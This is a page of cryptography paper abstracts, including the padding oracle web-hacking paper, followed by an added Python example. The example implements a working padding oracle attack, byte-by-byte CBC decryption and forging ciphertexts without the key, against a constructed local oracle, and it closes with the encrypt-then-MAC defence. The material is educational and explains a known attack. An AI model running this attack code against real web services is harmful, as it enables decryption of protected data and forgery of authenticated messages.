Abstract: We introduce the concept of attribute-based authenticated key exchange (AB-AKE) within the framework of ciphertext-policy attribute-based systems. A notion of AKE-security for AB-AKE is presented based on the security models for group key exchange protocols and also taking into account the security requirements generally considered in the ciphertext-policy attribute-based setting. We also introduce a new primitive called encapsulation policy attribute-based key encapsulation mechanism (EP-AB-KEM) and then define a notion of chosen ciphertext security for EP-AB-KEMs. A generic one-round AB-AKE protocol that satisfies our AKE-security notion is then presented. The protocol is generically constructed from any EP-AB-KEM that achieves chosen ciphertext security. Finally, we propose an EP-AB-KEM from an existing attribute-based encryption scheme and show that it achieves chosen ciphertext security in the generic group and random oracle models. Instantiating our AB-AKE protocol with this EP-AB-KEM will result in a concrete one-round AB-AKE protocol also secure in the generic group and random oracle models.

Journal ArticleDOI
TL;DR: This paper presents an IND-CCA2 secure identity-based proxy re-encryption scheme that has several useful properties, including multi-use and unidirectionality, among others.

09 Aug 2010
TL;DR: The padding oracle attack is turned into a new set of practical web hacking techniques, and a new technique is introduced that allows attackers to use a padding oracle to encrypt messages of any length without knowing the secret key.
Abstract: At Eurocrypt 2002, Vaudenay introduced a powerful side-channel attack, called the padding oracle attack, against CBC-mode encryption with PKCS#5 padding (see [6]). If there is an oracle which, on receipt of a ciphertext, decrypts it and then tells the sender whether the padding is correct or not, Vaudenay shows how to use that oracle to efficiently decrypt data without knowing the encryption key. In this paper, we turn the padding oracle attack into a new set of practical web hacking techniques. We also introduce a new technique that allows attackers to use a padding oracle to encrypt messages of any length without knowing the secret key. Finally, we show how to use that technique to mount advanced padding oracle exploits against popular web development frameworks.
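The two techniques the abstract describes, as an added example that is not the authors' tool or code: a constructed CBC/PKCS#5 endpoint that leaks only whether padding was valid, Vaudenay's byte-by-byte decryption against it, and the encrypt-without-the-key technique (working backwards from a freely chosen last block, each preceding block is set to D_k(C_i) XOR P_i, and the block computed for P_1 becomes the IV). The block cipher is a stand-in 4-round SHA-256 Feistel network, not AES, and the key and messages are constructed for the demo; the attack code treats the cipher as a black box, which is exactly why the attack is independent of the cipher. All names below are this example's own.

```python
import hashlib
import os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, r):  # Feistel round function
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]

def block_encrypt(key, blk):
    # Stand-in 128-bit block cipher (4-round SHA-256 Feistel), NOT AES: the attack never
    # looks inside the cipher, so any keyed permutation serves to demonstrate it.
    L, R = blk[:8], blk[8:]
    for r in range(4):
        L, R = R, xor(L, _f(key, R, r))
    return L + R

def block_decrypt(key, blk):
    L, R = blk[:8], blk[8:]
    for r in reversed(range(4)):
        L, R = xor(R, _f(key, L, r)), L
    return L + R

def pad(msg):  # PKCS#5/#7: n bytes of value n, 1 <= n <= 16
    n = BLOCK - len(msg) % BLOCK
    return msg + bytes([n]) * n

def unpad(msg):
    n = msg[-1]
    if not 1 <= n <= BLOCK or msg[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return msg[:-n]

def cbc_encrypt(key, iv, msg):
    out, prev = [], iv
    for i in range(0, len(msg), BLOCK):
        prev = block_encrypt(key, xor(msg[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(xor(block_decrypt(key, c), prev) for prev, c in zip([iv] + blocks, blocks))

class PaddingOracle:
    """The server side: decrypts and leaks only whether the padding was valid."""
    def __init__(self, key):
        self._key, self.queries = key, 0

    def __call__(self, iv, ct):
        self.queries += 1
        try:
            unpad(cbc_decrypt(self._key, iv, ct))
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, blk):
    """Vaudenay's core step: learn D_k(blk) byte by byte, last byte first, by sending blk
    behind a crafted IV and watching which IV byte makes the padding valid."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos                       # padding value we are trying to produce
        iv = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):          # already-known bytes: force them to padv
            iv[j] = inter[j] ^ padv
        for guess in range(256):
            iv[pos] = guess
            if not oracle(bytes(iv), blk):
                continue
            if pos == BLOCK - 1:                 # 0x01, or an accidental longer pad (02 02, ...)?
                alt = bytearray(iv)
                alt[pos - 1] ^= 0xFF
                if not oracle(bytes(alt), blk):
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle accepted no byte; not a padding oracle?")
    return bytes(inter)

def attack_decrypt(oracle, iv, ct):
    """Decrypt without the key: P_i = D_k(C_i) XOR C_{i-1}."""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(xor(recover_intermediate(oracle, c), prev) for prev, c in zip([iv] + blocks, blocks))
    return unpad(pt)

def attack_encrypt(oracle, msg):
    """Encrypt a chosen message without the key (the paper's technique): choose the last
    ciphertext block at random, learn D_k of it from the oracle, and set the preceding
    block to D_k(C_i) XOR P_i; the block computed for P_1 becomes the IV."""
    p = pad(msg)
    chain = [os.urandom(BLOCK)]
    for i in range(len(p) - BLOCK, -1, -BLOCK):
        chain.insert(0, xor(recover_intermediate(oracle, chain[0]), p[i:i + BLOCK]))
    return chain[0], b"".join(chain[1:])

def demo(key=b"constructed-key!", msg=b"attack at dawn; padding oracle demo"):
    """Constructed key/message; returns (decrypt attack worked, forge worked, oracle queries)."""
    oracle, iv = PaddingOracle(key), bytes(range(BLOCK))
    recovered = attack_decrypt(oracle, iv, cbc_encrypt(key, iv, pad(msg)))
    forged_iv, forged_ct = attack_encrypt(oracle, b"forged without the key")
    forged = unpad(cbc_decrypt(key, forged_iv, forged_ct)) == b"forged without the key"
    return recovered == msg, forged, oracle.queries
```

The cost is at most 256 oracle queries per byte (about 128 on average), so a 3-block message falls in a few thousand requests, and the encryption direction costs the same per block because it is the same intermediate-value recovery run in reverse. The extra query at the last byte position rules out the case where the candidate byte happens to produce a valid two-byte (or longer) pad rather than 0x01. The defence implied by the abstract is to deny the attacker the oracle: authenticate the ciphertext (an encrypt-then-MAC tag or an AEAD mode) and reject before any padding check, so that padding errors and MAC errors are indistinguishable in both response and timing.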